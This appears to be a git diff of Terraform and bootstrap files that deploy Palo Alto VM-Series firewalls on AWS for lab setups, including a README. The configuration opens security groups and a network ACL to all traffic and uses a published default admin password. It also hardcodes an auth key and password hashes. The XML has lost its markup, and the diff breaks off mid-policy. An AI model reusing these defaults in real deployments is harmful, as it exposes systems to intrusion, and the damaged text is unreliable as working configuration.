+++ b/aws/VPC_Mirror_Target/bootstrap_files4/init-cfg.txt @@ -0,0 +1,19 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +hostname= +panorama-server= +panorama-server-2= +tplname= +dgname= +dns-primary=8.8.8.8 +dns-secondary= +vm-auth-key= +op-command-modes=mgmt-interface-swap +dhcp-send-hostname=yes +dhcp-send-client-id=yes +dhcp-accept-server-hostname=yes +dhcp-accept-server-domain=yes diff --git a/aws/VPC_Mirror_Target/nlb.tf b/aws/VPC_Mirror_Target/nlb.tf new file mode 100644 index 00000000..3835c45f --- /dev/null +++ b/aws/VPC_Mirror_Target/nlb.tf @@ -0,0 +1,39 @@ +resource "aws_lb" "mirror-lb" { + name = "mirror-lb-tf" + internal = true + load_balancer_type = "network" + subnets = ["${aws_subnet.vpc_mirror_pub_1.id}","${aws_subnet.vpc_mirror_pub_2.id}"] + + enable_deletion_protection = false + enable_cross_zone_load_balancing = true + tags = { + } +} +resource "aws_lb_target_group" "mirror-target" { + name = "mirror-target" + port = 4789 + protocol = "UDP" + vpc_id = "${aws_vpc.vpc_security.id}" + health_check { + port = 80 + protocol = "HTTP" + } +} +resource "aws_lb_listener" "mirror-listener" { + load_balancer_arn = "${aws_lb.mirror-lb.arn}" + port = "4789" + protocol = "UDP" + + default_action { + type = "forward" + target_group_arn = "${aws_lb_target_group.mirror-target.arn}" + } +} +resource "aws_lb_target_group_attachment" "mirror1" { + target_group_arn = "${aws_lb_target_group.mirror-target.arn}" + target_id = "${module.ngfw3.instanceid}" +} +resource "aws_lb_target_group_attachment" "mirror3" { + target_group_arn = "${aws_lb_target_group.mirror-target.arn}" + target_id = "${module.ngfw4.instanceid}" +} \ No newline at end of file diff --git a/aws/VPC_Mirror_Target/providers.tf b/aws/VPC_Mirror_Target/providers.tf new file mode 100644 index 00000000..af7b0ba3 --- /dev/null +++ b/aws/VPC_Mirror_Target/providers.tf @@ -0,0 +1,3 @@ +provider "aws" { + region = "${var.aws_region}" +} diff --git a/aws/VPC_Mirror_Target/variables.tf b/aws/VPC_Mirror_Target/variables.tf new file mode 100644 index 00000000..184e2854 --- /dev/null +++ b/aws/VPC_Mirror_Target/variables.tf @@ -0,0 +1,72 @@ +//This section should be verified and modified accordingly. 
+ +variable aws_region { + description = "AWS Region for deployment" + default = "us-east-2" +} + +variable aws_key { + description = "aws_key" + default = "AWS-Ohio-Key" +} + +//Do not create these. The Terraform will do that. Just need to make secure +//the s3 bucket names are unique. + + +variable bootstrap_s3bucket3 { + description = "S3 Bucket Name used to Bootstrap the NGFWs" + default = "djs-tgw-bucket-blah-3" +} + +variable bootstrap_s3bucket4 { + description = "S3 Bucket Name used to Bootstrap the NGFWs" + default = "djs-tgw-bucket-blah-4" +} +//End of the section that MUST be modified to work +variable management_cidr { + description = "CIDR Address for Management Access" + default = "0.0.0.0/0" +} + +variable vpc_security_cidr { + description = "CIDR Address for Security VPC" + default = "192.168.0.0/16" +} + + +################# +# Mirror Subnets +################# +variable vpc_mirror_pub_1 { + description = "CIDR Address for Security VPC" + default = "192.168.51.0/24" +} + +variable fw_ip_subnet_pub_1 { + description = "CIDR Address for Security VPC" + default = "192.168.51.45" +} +variable fw_ip_subnet_mgmt_1 { + description = "CIDR Address for Security VPC" + default = "192.168.51.44" +} + +variable vpc_mirror_pub_2 { + description = "CIDR Address for Security VPC" + default = "192.168.61.0/24" +} + +variable fw_ip_subnet_mgmt_2 { + description = "CIDR Address for Security VPC" + default = "192.168.61.44" +} +variable fw_ip_subnet_pub_2 { + description = "CIDR Address for Security VPC" + default = "192.168.61.45" +} + +############# + + + diff --git a/aws/VPC_Mirror_Target/vm-series/main.tf b/aws/VPC_Mirror_Target/vm-series/main.tf new file mode 100644 index 00000000..8543edcd --- /dev/null +++ b/aws/VPC_Mirror_Target/vm-series/main.tf @@ -0,0 +1,154 @@ +variable name { + description = "firewall instance name" +} + +variable untrust_subnet_id {} +variable untrust_security_group_id {} +variable untrustfwip {} +variable mgmtfwip {} + + +variable management_subnet_id {} +variable management_security_group_id {} + +variable bootstrap_profile { + default = "" +} + +variable bootstrap_s3bucket {} + + +variable aws_region {} +variable aws_key {} + +variable instance_type { + default = "m5.xlarge" +} + +variable ngfw_license_type { + default = "payg2" +} + +variable ngfw_version { + default = "9.0" +} + +variable "license_type_map" { + type = "map" + + default = { + "byol" = "6njl1pau431dv1qxipg63mvah" + "payg1" = "6kxdw3bbmdeda3o6i1ggqt4km" + "payg2" = "806j2of0qy5osgjjixq9gqc6g" + } +} + +data "aws_ami" "panw_ngfw" { + most_recent = true + owners = ["aws-marketplace"] + + filter { + name = "owner-alias" + values = ["aws-marketplace"] + } + + filter { + name = "product-code" + values = ["${var.license_type_map[var.ngfw_license_type]}"] + } + + filter { + name = "name" + values = ["PA-VM-AWS-${var.ngfw_version}*"] + } +} + +data "aws_region" "current" { + name = "${var.aws_region}" +} + +resource "aws_network_interface" "eni-management" { + subnet_id = "${var.management_subnet_id}" + private_ips = ["${var.mgmtfwip}"] + security_groups = ["${var.management_security_group_id}"] + source_dest_check = true + + tags { + Name = "eni_${var.name}_management" + } +} + + + + + +resource "aws_eip" "eip-management" { + vpc = true + network_interface = "${aws_network_interface.eni-management.id}" + + tags { + Name = "eip_${var.name}_management" + } +} + +resource "aws_network_interface" "eni-untrust" { + subnet_id = "${var.untrust_subnet_id}" + private_ips = ["${var.untrustfwip}"] + 
security_groups = ["${var.untrust_security_group_id}"] + source_dest_check = false + + tags { + Name = "eni_${var.name}_untrust" + } +} + +resource "aws_eip" "eip-untrust" { + vpc = true + network_interface = "${aws_network_interface.eni-untrust.id}" + + tags { + Name = "eip_${var.name}_untrust" + } +} + +resource "aws_instance" "instance-ngfw" { + disable_api_termination = false + instance_initiated_shutdown_behavior = "stop" + iam_instance_profile = "${var.bootstrap_profile}" + user_data = "${base64encode(join("", list("vmseries-bootstrap-aws-s3bucket=", var.bootstrap_s3bucket)))}" + + ebs_optimized = true + ami = "${data.aws_ami.panw_ngfw.image_id}" + instance_type = "${var.instance_type}" + key_name = "${var.aws_key}" + + monitoring = false + + network_interface { + device_index = 1 + network_interface_id = "${aws_network_interface.eni-management.id}" + } + + network_interface { + device_index = 0 + network_interface_id = "${aws_network_interface.eni-untrust.id}" + } + + + + tags { + Name = "${var.name}" + } +} + +output "eip_untrust" { + value = "${aws_eip.eip-untrust.public_ip}" +} + +output "eip_mgmt" { + value = "${aws_eip.eip-management.public_ip}" +} + +output "instanceid" { + value = "${aws_instance.instance-ngfw.id}" +} diff --git a/aws/VPC_Mirror_Target/vpc_security.tf b/aws/VPC_Mirror_Target/vpc_security.tf new file mode 100644 index 00000000..089e4a42 --- /dev/null +++ b/aws/VPC_Mirror_Target/vpc_security.tf @@ -0,0 +1,176 @@ +data "aws_availability_zones" "available" {} + +resource "aws_vpc" "vpc_security" { + cidr_block = "${var.vpc_security_cidr}" + + tags { + Name = "vpc_security" + } +} + + +################# +# Mirror Subnets +################# +resource "aws_subnet" "vpc_mirror_pub_1" { + vpc_id = "${aws_vpc.vpc_security.id}" + cidr_block = "${var.vpc_mirror_pub_1}" + availability_zone = "${data.aws_availability_zones.available.names[0]}" + + tags { + Name = "vpc_mirror_pub_1" + } +} + + +resource "aws_subnet" "vpc_mirror_pub_2" { + vpc_id = "${aws_vpc.vpc_security.id}" + cidr_block = "${var.vpc_mirror_pub_2}" + availability_zone = "${data.aws_availability_zones.available.names[1]}" + + tags { + Name = "vpc_mirror_pub_2" + } +} + + +################### + + + + +resource "aws_internet_gateway" "vpc_security_igw" { + vpc_id = "${aws_vpc.vpc_security.id}" + + tags { + Name = "vpc_securty_igw" + } +} + +resource "aws_route" "vpc_security_default" { + route_table_id = "${aws_vpc.vpc_security.default_route_table_id}" + destination_cidr_block = "0.0.0.0/0" + gateway_id = "${aws_internet_gateway.vpc_security_igw.id}" +} + +resource "aws_security_group" "allow_all" { + name = "allow_all" + description = "Allow all inbound traffic" + vpc_id = "${aws_vpc.vpc_security.id}" +} + +resource "aws_security_group_rule" "allow_all_ingress" { + type = "ingress" + from_port = 0 + to_port = 0 + protocol = "-1" + cidr_blocks = ["0.0.0.0/0"] + + security_group_id = "${aws_security_group.allow_all.id}" +} + +resource "aws_security_group_rule" "allow_all_egress" { + type = "egress" + from_port = 0 + to_port = 0 + protocol = "-1" + cidr_blocks = ["0.0.0.0/0"] + + security_group_id = "${aws_security_group.allow_all.id}" +} + +resource "aws_security_group" "allow_https_ssh" { + name = "allow_https_ssh" + description = "Allow HTTPS and SSH inbound traffic" + vpc_id = "${aws_vpc.vpc_security.id}" +} + +resource "aws_security_group_rule" "allow_ssh_ingress" { + type = "ingress" + from_port = 22 + to_port = 22 + protocol = "tcp" + cidr_blocks = ["${var.management_cidr}"] + + security_group_id = 
"${aws_security_group.allow_https_ssh.id}" +} + +resource "aws_security_group_rule" "allow_https_ingress" { + type = "ingress" + from_port = 443 + to_port = 443 + protocol = "tcp" + cidr_blocks = ["${var.management_cidr}"] + + security_group_id = "${aws_security_group.allow_https_ssh.id}" +} + +resource "aws_security_group_rule" "allow_all" { + type = "egress" + from_port = 0 + to_port = 0 + protocol = "-1" + cidr_blocks = ["0.0.0.0/0"] + + security_group_id = "${aws_security_group.allow_https_ssh.id}" +} + +################### +# VPC Mirror FWs +################### +module "ngfw3" { + source = "./vm-series/" + + name = "ngfw3" + + aws_key = "${var.aws_key}" + + + + untrust_subnet_id = "${aws_subnet.vpc_mirror_pub_1.id}" + untrust_security_group_id = "${aws_security_group.allow_all.id}" + untrustfwip = "${var.fw_ip_subnet_pub_1}" + + management_subnet_id = "${aws_subnet.vpc_mirror_pub_1.id}" + management_security_group_id = "${aws_security_group.allow_https_ssh.id}" + mgmtfwip = "${var.fw_ip_subnet_mgmt_1}" + + bootstrap_profile = "${aws_iam_instance_profile.bootstrap_profile3.id}" + bootstrap_s3bucket = "${var.bootstrap_s3bucket3}" + + + + aws_region = "${var.aws_region}" +} +module "ngfw4" { + source = "./vm-series/" + + name = "ngfw4" + + aws_key = "${var.aws_key}" + + + + untrust_subnet_id = "${aws_subnet.vpc_mirror_pub_2.id}" + untrust_security_group_id = "${aws_security_group.allow_all.id}" + untrustfwip = "${var.fw_ip_subnet_pub_2}" + + management_subnet_id = "${aws_subnet.vpc_mirror_pub_2.id}" + management_security_group_id = "${aws_security_group.allow_https_ssh.id}" + mgmtfwip = "${var.fw_ip_subnet_mgmt_2}" + + bootstrap_profile = "${aws_iam_instance_profile.bootstrap_profile4.id}" + bootstrap_s3bucket = "${var.bootstrap_s3bucket4}" + + + + aws_region = "${var.aws_region}" +} +####################### + +output "FW-3-MGMT" { + value = "Access the firewall MGMT via: https://${module.ngfw3.eip_mgmt}" +} +output "FW-4-MGMT" { + value = "Access the firewall MGMT via: https://${module.ngfw4.eip_mgmt}" +} diff --git a/aws/sdwan-lab/access-control-lists.tf b/aws/sdwan-lab/access-control-lists.tf new file mode 100644 index 00000000..2ffce3a5 --- /dev/null +++ b/aws/sdwan-lab/access-control-lists.tf @@ -0,0 +1,26 @@ +resource "aws_network_acl" "allow-all" { + vpc_id = "${aws_vpc.SDWAN.id}" + subnet_ids = ["${aws_subnet.SD-WAN-MGT.id}","${aws_subnet.SD-WAN-WAN1.id}","${aws_subnet.SD-WAN-WAN2.id}","${aws_subnet.SD-WAN-WAN3.id}","${aws_subnet.SD-WAN-WAN4.id}","${aws_subnet.SD-WAN-MPLS.id}","${aws_subnet.SD-WAN-Branch25.id}","${aws_subnet.SD-WAN-Branch50.id}","${aws_subnet.SD-WAN-Hub.id}",] + + egress { + protocol = "-1" + rule_no = 2 + action = "allow" + cidr_block = "0.0.0.0/0" + from_port = 0 + to_port = 0 + } + + ingress { + protocol = "-1" + rule_no = 1 + action = "allow" + cidr_block = "0.0.0.0/0" + from_port = 0 + to_port = 0 + } + + tags { + Name = "allow-all" + } +} \ No newline at end of file diff --git a/aws/sdwan-lab/aws_vars.tf b/aws/sdwan-lab/aws_vars.tf new file mode 100644 index 00000000..d2ad45d7 --- /dev/null +++ b/aws/sdwan-lab/aws_vars.tf @@ -0,0 +1,121 @@ +variable "aws_region" {} +#variable "aws_access_key" {} +#variable "aws_secret_key" {} +variable "VPC-Name" {} +variable "SD-WAN-HUB-FW" {} +variable "SD-WAN-HUB-SVR" {} +variable "SD-WAN-ROUTER-JITTER" {} +variable "SD-WAN-BRANCH25-FW" {} +variable "SD-WAN-BRANCH50-FW" {} +variable "SD-WAN-BRANCH25-IWS" {} +variable "SD-WAN-BRANCH50-IWS" {} +variable "VPCCIDR" {} +variable "SD-WAN-MGT" {} +variable "SD-WAN-WAN1" {} 
+variable "SD-WAN-WAN2" {} +variable "SD-WAN-WAN3" {} +variable "SD-WAN-WAN4" {} +variable "SD-WAN-MPLS" {} +variable "SD-WAN-Branch25" {} +variable "SD-WAN-Branch50" {} +variable "SD-WAN-Hub" {} +variable "ServerKeyName" {} + +#VMSeries 9.0.3-xfr BYOL +variable "PANFWRegionMap" { + type = "map" + + default = { + "ap-northeast-1" = "ami-04bd06018d53fd939" + + "ap-northeast-2" = "ami-0566141c898e243fc" + + "ap-south-1" = "ami-0ef9ba2fb8c8b2f23" + + "ap-southeast-1" = "ami-023496caf9aedcbb5" + + "ap-southeast-2" = "ami-08399a38c19098edb" + + "ca-central-1" = "ami-0f4812911392bee42" + + "eu-central-1" = "ami-04102d137edd8a952" + + "eu-north-1" = "ami-d59d17ab" + + "eu-west-1" = "ami-09312982f28611e13" + + "eu-west-2" = "ami-0063940db47af7581" + + "eu-west-3" = "ami-07a4c669069e02995" + + "sa-east-1" = "ami-077e676dce3d06231" + + "us-east-1" = "ami-0ec2529b60a7fff22" + + "us-east-2" = "ami-06efcb94b48d8263c" + + "us-west-1" = "ami-03801628148e17514" + + "us-west-2" = "ami-05a457c9f5f6a45e0" + } +} +variable "PanoramaRegionMap" { + type = "map" + #Panorama 9.0.5 + default = { + "ap-northeast-1" = "ami-08e8bded936bbd795" + + "ap-northeast-2" = "ami-0569a43a1ab4864e0" + + "ap-south-1" = "ami-01e194040c88ec7f7" + + "ap-southeast-1" = "ami-05946a342e4f38c79" + + "ap-southeast-2" = "ami-060009b850df3908c" + + "ca-central-1" = "ami-042b6efd5f827ea88" + + "eu-central-1" = "ami-0d4a11e11365c9bae" + + "eu-north-1" = "ami-0d274936829f13359" + + "eu-west-1" = "ami-06a1715befd746fe4" + + "eu-west-2" = "ami-03a4a370ee5442bac" + + "eu-west-3" = "ami-0637f615e0f748d62" + + "sa-east-1" = "ami-091669d04559b7056" + + "us-east-1" = "ami-0fd6fc67d9f2e7750" + + "us-east-2" = "ami-013c503f1741aa646" + + "us-west-1" = "ami-02e821dd4b602e9ec" + + "us-west-2" = "ami-0403335c2e31d2a81" + } +} +variable "UbuntuRegionMap" { + type = "map" + + #Ubuntu Server 18.04 LTS (HVM) + default = { + "ap-northeast-1" = "ami-014cc8d7cb6d26dc8" + "ap-northeast-2" = "ami-004b3430b806f3b1a" + "ap-south-1" = "ami-0f59afa4a22fad2f0" + "ap-southeast-1" = "ami-08b3278ea6e379084" + "ap-southeast-2" = "ami-00d7116c396e73b04" + "ca-central-1" = "ami-0086bcfbab4b22f60" + "eu-central-1" = "ami-0062c497b55437b01" + "eu-north-1" = "ami-0ca3b50bc99a41773" + "eu-west-1" = "ami-0987ee37af7792903" + "eu-west-2" = "ami-05945867d79b7d926" + "eu-west-3" = "ami-00c60f4df93ff408e" + "sa-east-1" = "ami-0fb487b6f6ab53ff" + "us-east-1" = "ami-09f9d773751b9d606" + "us-east-2" = "ami-0891395d749676c2e" + "us-west-1" = "ami-0c0e5a396959508b0" + "us-west-2" = "ami-0bbe9b07c5fe8e86e" + } +} diff --git a/aws/sdwan-lab/branch25-fw-bootstrap.tf b/aws/sdwan-lab/branch25-fw-bootstrap.tf new file mode 100644 index 00000000..678d93cc --- /dev/null +++ b/aws/sdwan-lab/branch25-fw-bootstrap.tf @@ -0,0 +1,56 @@ +# Create a BootStrap S3 Bucket + +resource "random_id" "branch25-fw-bucket_prefix" { + byte_length = 4 +} + +resource "aws_s3_bucket" "branch25-fw-bootstrap-bucket" { + #branch25-fw-bucket_prefix = "${var.branch25-fw-bucket_prefix}" + bucket = "branch25-fw-${lower(random_id.branch25-fw-bucket_prefix.hex)}" + acl = "private" + force_destroy = true + + tags { + Name = "branch25-fw-bootstrap-bucket" + } +} + +#resource "aws_s3_bucket_object" "branch25-fw-bootstrap_xml" { +# depends_on = ["aws_s3_bucket.branch25-fw-bootstrap-bucket"] +# bucket = "branch25-fw-${lower(random_id.branch25-fw-bucket_prefix.hex)}" +# acl = "private" +# key = "config/bootstrap.xml" +# source = "branch25-fw-bootstrap/bootstrap.xml" +#} + +resource "aws_s3_bucket_object" 
"branch25-fw-init-cft_txt" { + bucket = "branch25-fw-${lower(random_id.branch25-fw-bucket_prefix.hex)}" + depends_on = ["aws_s3_bucket.branch25-fw-bootstrap-bucket"] + acl = "private" + key = "config/init-cfg.txt" + source = "branch25-fw-bootstrap/init-cfg.txt" +} + +resource "aws_s3_bucket_object" "branch25-fw-software" { + bucket = "branch25-fw-${lower(random_id.branch25-fw-bucket_prefix.hex)}" + depends_on = ["aws_s3_bucket.branch25-fw-bootstrap-bucket"] + acl = "private" + key = "software/" + source = "/dev/null" +} + +resource "aws_s3_bucket_object" "branch25-fw-license" { + bucket = "branch25-fw-${lower(random_id.branch25-fw-bucket_prefix.hex)}" + depends_on = ["aws_s3_bucket.branch25-fw-bootstrap-bucket"] + acl = "private" + key = "license/" + source = "/dev/null" +} + +resource "aws_s3_bucket_object" "branch25-fw-content" { + bucket = "branch25-fw-${lower(random_id.branch25-fw-bucket_prefix.hex)}" + depends_on = ["aws_s3_bucket.branch25-fw-bootstrap-bucket"] + acl = "private" + key = "content/" + source = "/dev/null" +} diff --git a/aws/sdwan-lab/branch25-fw-bootstrap/init-cfg.txt b/aws/sdwan-lab/branch25-fw-bootstrap/init-cfg.txt new file mode 100644 index 00000000..ee4b3c1f --- /dev/null +++ b/aws/sdwan-lab/branch25-fw-bootstrap/init-cfg.txt @@ -0,0 +1,18 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +hostname=FW-1 +vm-auth-key=649475581476015 +panorama-server=52.35.104.230 +panorama-server-2= +tplname=tgw-vpc-az1-stack +dgname=tgw-vpc-az1 +dns-primary= +dns-secondary= +dhcp-send-hostname=yes +dhcp-send-client-id=yes +dhcp-accept-server-hostname=yes +dhcp-accept-server-domain=yes \ No newline at end of file diff --git a/aws/sdwan-lab/branch25-fw.tf b/aws/sdwan-lab/branch25-fw.tf new file mode 100644 index 00000000..0a274368 --- /dev/null +++ b/aws/sdwan-lab/branch25-fw.tf @@ -0,0 +1,138 @@ +resource "aws_iam_role" "branch25-fw-bootstraprole" { + name = "branch25-fw-bootstraprole-${random_id.sdwan.hex}" + + assume_role_policy = < + +

+ +#### VM-Series Overview +* Firewall-1 handles egress traffic to internet +* Firewall-2 handles east/west traffic between Spoke1-VPC and Spoke2-VPC +* Both Firewalls can handle inbound traffic to the spokes +* Firewalls are bootstrapped off an S3 Bucket (buckets are created during deployment) + +#### S3 Buckets Overview +* 2 x S3 Buckets are deployed & configured to bootstrap the firewalls with a fully working configuration. +* The buckets names have a random 30 string added to its name for global uniqueness `tgw-fw#-bootstrap-` + +## Prerequistes +1. This Terraform build assumes the AWS CLI is installed on the machine doing the deploymnet [(Install AWS CLI)](https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-install.html) . +2. If you do not want to use the AWS CLI, the `providers.tf` must be modified to include your AWS Access Key and Secret Key [(more info)](https://www.terraform.io/docs/providers/aws/index.html). + +## How to Deploy +1. Download the **tgw_2fw_vpc_insertion** directory. +2. In an editor, open `variables.tf` + * `Line 10`: Set your existing AWS EC2 Key + * `Line 14`: Enter a source address to access the VM-Series management interface (in valid CIDR notation). This address will be added to the management interface's Network Security Group. + * `Line 17`: Uncomment either 'byol', 'payg1', or 'payg2'. This sets the licensing for both VM-Series firewalls (bring-your-own-license, bundle1, or bundle2). +3. (Optional) If you are using BYOL and would like to license the VM-Series via bootstrapping, paste your authcode in `bootstrap_files/fw1/authcodes` and `bootstrap_files/fw2/authcodes`. (Note: The authcode must be registered prior to deployment). +4. After deployment, the firewalls' username and password are: + * **Username:** paloalto + * **Password:** PanPassword123! + +## Support Policy +The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself. +Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy. diff --git a/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw1/authcodes b/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw1/authcodes new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw1/authcodes @@ -0,0 +1 @@ + diff --git a/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw1/bootstrap.xml b/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw1/bootstrap.xml new file mode 100644 index 00000000..c9e19aeb --- /dev/null +++ b/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw1/bootstrap.xml @@ -0,0 +1,822 @@ + + + + + + $1$kinpefww$Y2Rzm/JZNfQxs6SB3oW5A. 
+ + + yes + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDSWphVDNFbnRlRU80cHFIM09aRnFIOFB6ekFnZmtnNG1yYnNpaWZyZzZDTDJqNjFmbWhIRTFVdjlZalBVRjhJMUhrei9lWGpuMno4Z2ltOEdVcFR1WDExUXhiSmNsM1NLYU51VGxWWVA0VnJvSmJDU3VBVStDdzcyT3haMTN3UVFXa0JzaDRnV05iZ3dnSU1TcURHckYvSlZMV2JxemZDeWFEVmltVVRqdFN4L0NSVDUwbEpqdGR4b2pVdm5mUHZnWXQrVVNBNVpqSExPMDJvY1hZcXBhSEp3UnN5OUo2NGtVcEluRXBKYlFqbXZhajJieVIzb1ZkYzVuVlNsREtvWVlzd1ZNUlZxUXQwNDFYdFhhSm9yZm9SYnF1dmd6Vk1sN2w5V0JWQ2RYOE8rbm9iSHlMT1lZdVBqU05IN1FKZVNPeDJkd1N2ZG9zRmJmZ3ZpUHRjT1QgbXJtLWVhc3R1cy1rZXk= + + + + + yes + + + $1$oxidaogq$toVFt6xD7ruJnTHYeVftq1 + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + + + + + + + + + + + + + + no + + + + + no + + + no + + + + + + + + + + no + + + + + no + + + no + + + no + + allow-lambda + + + + + + + + + + + 3 + 5 + wait-recover + + + + + yes + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + sha1 + + + group2 + + + aes-128-cbc + + + 28800 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + sha1 + + + aes-128-cbc + + + + 3600 + + group2 + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + no + + + no + + + no + + + no + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + + + + no + any + 2 + + + 192.168.10.1 + + + None + + ethernet1/1 + 10 + 0.0.0.0/0 + + + + + + + no + any + 2 + + + 192.168.20.1 + + + None + + ethernet1/2 + 10 + 10.0.0.0/8 + + + + + + + + + + + + + + + + + + yes + yes + no + yes + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + America/New_York + + yes + yes + + vmseries-fw1 + + + + yes + + + FQDN + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDSWphVDNFbnRlRU80cHFIM09aRnFIOFB6ekFnZmtnNG1yYnNpaWZyZzZDTDJqNjFmbWhIRTFVdjlZalBVRjhJMUhrei9lWGpuMno4Z2ltOEdVcFR1WDExUXhiSmNsM1NLYU51VGxWWVA0VnJvSmJDU3VBVStDdzcyT3haMTN3UVFXa0JzaDRnV05iZ3dnSU1TcURHckYvSlZMV2JxemZDeWFEVmltVVRqdFN4L0NSVDUwbEpqdGR4b2pVdm5mUHZnWXQrVVNBNVpqSExPMDJvY1hZcXBhSEp3UnN5OUo2NGtVcEluRXBKYlFqbXZhajJieVIzb1ZkYzVuVlNsREtvWVlzd1ZNUlZxUXQwNDFYdFhhSm9yZm9SYnF1dmd6Vk1sN2w5V0JWQ2RYOE8rbm9iSHlMT1lZdVBqU05IN1FKZVNPeDJkd1N2ZG9zRmJmZ3ZpUHRjT1QgbXJtLWVhc3R1cy1rZXk= + + + yes + yes + no + yes + + + vmseries-fw1 + mgmt-interface-swap + + + + + + + + + + + + + ethernet1/1 + + + + + + + ethernet1/2 + + + + + + + + + 1001 + + + + + + + + + + 2001 + + + + + + + + + + 1002 + + + + + + + + + + 2002 + + + + + + + + + + + + + + + trust-zone + + + untrust-zone + + + any + + + any + + + any + + + any + + + ssh + + + tcp-1001 + tcp-1002 + tcp-2001 + tcp-2002 + + + any + + allow + yes + + + + trust-zone + + + trust-zone + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + + + + untrust-zone + + + trust-zone + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + deny + + + + + + + + + + ethernet1/1 + + + + + untrust-zone + + + trust-zone + + + any + + + any + + any + + + + 
untrust-zone + + + untrust-zone + + + any + + + untrust-fw1 + + tcp-1001 + + + + ethernet1/2 + + + + + 22 + 10.1.0.4 + + any + + + + untrust-zone + + + untrust-zone + + + any + + + untrust-fw1 + + tcp-1002 + + + + ethernet1/2 + + + + + 22 + 10.1.1.4 + + + + + untrust-zone + + + untrust-zone + + + any + + + untrust-fw1 + + tcp-2001 + + + + ethernet1/2 + + + + + 22 + 10.2.0.4 + + + + + untrust-zone + + + untrust-zone + + + any + + + untrust-fw1 + + tcp-2002 + + + + ethernet1/2 + + + + + 22 + 10.2.1.4 + + + + + + + + allow + no + yes + + + deny + no + yes + + + + + + + + ethernet1/1 + ethernet1/2 + + + +
+ + 192.168.10.4 + +
+ + + color6 + + + color13 + + +
+
+
+
+
diff --git a/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw1/init-cfg.txt b/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw1/init-cfg.txt new file mode 100644 index 00000000..968814f6 --- /dev/null +++ b/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw1/init-cfg.txt @@ -0,0 +1,18 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +hostname=vmseries-fw1 +panorama-server= +panorama-server-2= +tplname= +dgname= +dns-primary= +dns-secondary= +op-command-modes=mgmt-interface-swap +dhcp-send-hostname=yes +dhcp-send-client-id=yes +dhcp-accept-server-hostname=no +dhcp-accept-server-domain=yes diff --git a/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw2/authcodes b/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw2/authcodes new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw2/authcodes @@ -0,0 +1 @@ + diff --git a/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw2/bootstrap.xml b/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw2/bootstrap.xml new file mode 100644 index 00000000..32e7d2e8 --- /dev/null +++ b/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw2/bootstrap.xml @@ -0,0 +1,821 @@ + + + + + + $1$gyvolqhn$qTxyak3dNrZGte6mj5znJ. + + + yes + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDSWphVDNFbnRlRU80cHFIM09aRnFIOFB6ekFnZmtnNG1yYnNpaWZyZzZDTDJqNjFmbWhIRTFVdjlZalBVRjhJMUhrei9lWGpuMno4Z2ltOEdVcFR1WDExUXhiSmNsM1NLYU51VGxWWVA0VnJvSmJDU3VBVStDdzcyT3haMTN3UVFXa0JzaDRnV05iZ3dnSU1TcURHckYvSlZMV2JxemZDeWFEVmltVVRqdFN4L0NSVDUwbEpqdGR4b2pVdm5mUHZnWXQrVVNBNVpqSExPMDJvY1hZcXBhSEp3UnN5OUo2NGtVcEluRXBKYlFqbXZhajJieVIzb1ZkYzVuVlNsREtvWVlzd1ZNUlZxUXQwNDFYdFhhSm9yZm9SYnF1dmd6Vk1sN2w5V0JWQ2RYOE8rbm9iSHlMT1lZdVBqU05IN1FKZVNPeDJkd1N2ZG9zRmJmZ3ZpUHRjT1QgbXJtLWVhc3R1cy1rZXk= + + + + + yes + + + $1$lfqxgvff$AYLGhPFeBO8CyXTeBaqEg. 
